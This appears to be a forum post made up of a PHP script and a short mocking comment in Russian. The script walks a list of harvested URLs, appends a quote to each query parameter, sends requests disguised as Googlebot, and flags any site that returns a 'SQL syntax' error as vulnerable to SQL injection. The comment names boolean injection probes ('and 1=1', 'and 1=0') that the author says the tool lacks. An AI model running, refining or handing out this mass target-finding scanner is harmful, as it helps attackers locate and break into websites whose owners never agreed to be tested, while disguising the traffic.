- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
// Идём по списку ссылок и тестим на скули
$re=0;
$view=0;
for ($i = 0; $i <= count($result)-1; $i++) {
$view++;
if ($view==10){
$view=0;
$n = $i+1;
echo "<span class='msg'>Проверенно ".$n." ссылок<br>";
ob_flush();
flush();
}
if (is_integer(strpos($result[$i],"="))) {
$s=$result[$i];
$s=str_replace("&","'&",$s);
$s = $s."'";
$parse=parse_url($s);
$www=$parse[host];
$link=$parse[path]."?".$parse[query];
$connect=@fsockopen($www, 80, $errno, $errstr, 5);
if ($connect) {
$brow="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)";
$out = "GET $link HTTP/1.0\r\n";
$out .= "Host: $www\r\n";
$out .= "User-Agent: $brow\r\n";
$out .= "Connection: Close\r\n\r\n";
fputs($connect, $out);
while (!@feof($connect)) {
$ge=@fgets($connect,1024);
if (strpos($ge,"SQL syntax")) {
echo '<a href=\'#\' onclick=\'return openwin("'.$s.'")\'>'.$s.'</a><br>';
ob_flush();
flush();
break;
}
}
$re++;
fclose($connect);
}}
}
Парни из вебхакер.ру написали супер сканнер для гугла, который ищет бажные сайты с SQL-inj. strtolower не учим, да и сам мускул впринципе тоже о_0, ибо +and+1=1 && +and+1=0 подставить в параметр не в компитенте +)